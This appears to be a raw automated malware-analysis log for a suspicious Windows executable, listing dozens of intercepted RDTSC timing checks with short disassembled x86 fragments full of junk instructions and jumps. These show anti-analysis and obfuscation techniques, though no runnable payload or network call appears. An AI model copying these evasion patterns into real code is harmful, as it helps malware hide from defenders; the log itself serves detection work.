Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD5012 second address: CD5028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC16Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD5028 second address: CD502C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CD4D05 second address: CD4D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEDBFC second address: CEDC01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEDC01 second address: CEDC06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA0F second address: CECA37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D915F4C9h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FC9D915F4B6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA37 second address: CECA3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA3D second address: CECA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA48 second address: CECA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA4E second address: CECA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECA57 second address: CECA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC9D8BCC16Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECBF6 second address: CECBFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECBFA second address: CECC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jp 00007FC9D8BCC19Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC9D8BCC16Fh 0x00000014 ja 00007FC9D8BCC166h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CECC1E second address: CECC34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED081 second address: CED095 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC9D8BCC166h 0x00000008 jno 00007FC9D8BCC166h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED095 second address: CED099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED64A second address: CED650 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED7C4 second address: CED7DD instructions: 0x00000000 rdtsc 0x00000002 js 00007FC9D915F4B6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f pop edi 0x00000010 push ebx 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED917 second address: CED91D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CED91D second address: CED921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1B6 second address: CEF1C3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC9D8BCC166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1C3 second address: CEF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC9D915F4B6h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FC9D915F4B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1DA second address: CEF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CEF1DE second address: CEF1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF33C6 second address: CF3421 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c jl 00007FC9D8BCC176h 0x00000012 jmp 00007FC9D8BCC170h 0x00000017 jbe 00007FC9D8BCC16Ch 0x0000001d mov dword ptr [ebp+124674A7h], eax 0x00000023 push 00000004h 0x00000025 mov edx, dword ptr [ebp+122D1E2Fh] 0x0000002b push A4105B35h 0x00000030 push eax 0x00000031 push edx 0x00000032 jp 00007FC9D8BCC16Ch 0x00000038 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF3421 second address: CF3426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF36F3 second address: CF36F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF36F9 second address: CF36FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF48A7 second address: CF48BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9D8BCC16Bh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5F79 second address: CF5F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5F7D second address: CF5FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC9D8BCC173h 0x0000000d jmp 00007FC9D8BCC170h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FA8 second address: CF5FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC9D915F4C8h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FCA second address: CF5FCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FCE second address: CF5FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF5FD4 second address: CF6019 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jne 00007FC9D8BCC166h 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jns 00007FC9D8BCC166h 0x0000001c jno 00007FC9D8BCC166h 0x00000022 jmp 00007FC9D8BCC16Ah 0x00000027 popad 0x00000028 jmp 00007FC9D8BCC178h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: CF6019 second address: CF601E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70121 second address: 4D70131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D8BCC16Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70131 second address: 4D70150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a mov bx, si 0x0000000d mov ax, B285h 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov edx, 3A587000h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70150 second address: 4D70155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70155 second address: 4D70188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC9D915F4C7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D70188 second address: 4D701DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D8BCC16Fh 0x00000009 xor ecx, 5761613Eh 0x0000000f jmp 00007FC9D8BCC179h 0x00000014 popfd 0x00000015 call 00007FC9D8BCC170h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC9D8BCC16Ch 0x00000026 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60011 second address: 4D600C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dh, cl 0x0000000d pushfd 0x0000000e jmp 00007FC9D915F4C9h 0x00000013 add esi, 70EAF2D6h 0x00000019 jmp 00007FC9D915F4C1h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov bx, 2C12h 0x00000026 pushfd 0x00000027 jmp 00007FC9D915F4C3h 0x0000002c and eax, 2865F40Eh 0x00000032 jmp 00007FC9D915F4C9h 0x00000037 popfd 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a jmp 00007FC9D915F4BEh 0x0000003f mov ebp, esp 0x00000041 pushad 0x00000042 mov bh, al 0x00000044 mov di, 321Eh 0x00000048 popad 0x00000049 pop ebp 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007FC9D915F4C0h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00CD second address: 4DA00D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00D3 second address: 4DA00D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA00D7 second address: 4DA0132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FC9D8BCC16Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov cx, AD8Dh 0x00000016 mov ah, 95h 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FC9D8BCC16Bh 0x00000022 adc cx, 823Eh 0x00000027 jmp 00007FC9D8BCC179h 0x0000002c popfd 0x0000002d mov ax, 2987h 0x00000031 popad 0x00000032 pop ebp 0x00000033 pushad 0x00000034 mov edi, eax 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4DA0132 second address: 4DA0136 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30184 second address: 4D3018E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 546D5BB2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D3018E second address: 4D30222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esp 0x00000008 jmp 00007FC9D915F4C4h 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007FC9D915F4C0h 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov ax, dx 0x0000001b popad 0x0000001c push dword ptr [ebp+04h] 0x0000001f pushad 0x00000020 jmp 00007FC9D915F4C5h 0x00000025 pushfd 0x00000026 jmp 00007FC9D915F4C0h 0x0000002b sub si, 9988h 0x00000030 jmp 00007FC9D915F4BBh 0x00000035 popfd 0x00000036 popad 0x00000037 push dword ptr [ebp+0Ch] 0x0000003a jmp 00007FC9D915F4C6h 0x0000003f push dword ptr [ebp+08h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30222 second address: 4D30226 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D30226 second address: 4D3022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D3E second address: 4D50D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D42 second address: 4D50D48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50D48 second address: 4D50DB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC16Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC9D8BCC170h 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC9D8BCC16Dh 0x00000020 or ah, 00000026h 0x00000023 jmp 00007FC9D8BCC171h 0x00000028 popfd 0x00000029 mov ah, EBh 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50DB0 second address: 4D50DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D507D4 second address: 4D507F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D507F1 second address: 4D50842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC9D915F4BCh 0x00000011 adc cl, 00000048h 0x00000014 jmp 00007FC9D915F4BBh 0x00000019 popfd 0x0000001a movzx ecx, di 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007FC9D915F4C2h 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50842 second address: 4D50846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50846 second address: 4D50863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50863 second address: 4D5089A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 7B52h 0x00000007 movsx edi, si 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC16Eh 0x00000018 jmp 00007FC9D8BCC175h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D503C6 second address: 4D503D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC9D915F4BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603BC second address: 4D603E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC9D8BCC176h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603E9 second address: 4D603ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D603ED second address: 4D60409 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60409 second address: 4D6042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D915F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC9D915F4C0h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D6042D second address: 4D6043C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D6043C second address: 4D60442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60442 second address: 4D60446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D60446 second address: 4D60459 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704B1 second address: 4D704C0 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704C0 second address: 4D704C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704C4 second address: 4D704CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D704CA second address: 4D70532 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC9D915F4BCh 0x00000009 adc si, 2288h 0x0000000e jmp 00007FC9D915F4BBh 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FC9D915F4C8h 0x0000001a or ax, 84E8h 0x0000001f jmp 00007FC9D915F4BBh 0x00000024 popfd 0x00000025 popad 0x00000026 pop edx 0x00000027 pop eax 0x00000028 mov dword ptr [esp], ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC9D915F4C5h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505A3 second address: 4D505A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505A9 second address: 4D505AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505AD second address: 4D505F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx ebx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC9D8BCC178h 0x00000018 jmp 00007FC9D8BCC175h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D505F3 second address: 4D50606 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d mov ebx, 42C05368h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D50606 second address: 4D50678 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC9D8BCC16Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC9D8BCC170h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC9D8BCC16Dh 0x0000001a add eax, 2A8E3C36h 0x00000020 jmp 00007FC9D8BCC171h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FC9D8BCC170h 0x0000002c adc eax, 53AD6B58h 0x00000032 jmp 00007FC9D8BCC16Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D7008E second address: 4D700CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC9D915F4C7h 0x00000008 call 00007FC9D915F4C8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700CB second address: 4D700CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\6SoKuOqyNh.exe	RDTSC instruction interceptor: First address: 4D700CF second address: 4D700D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
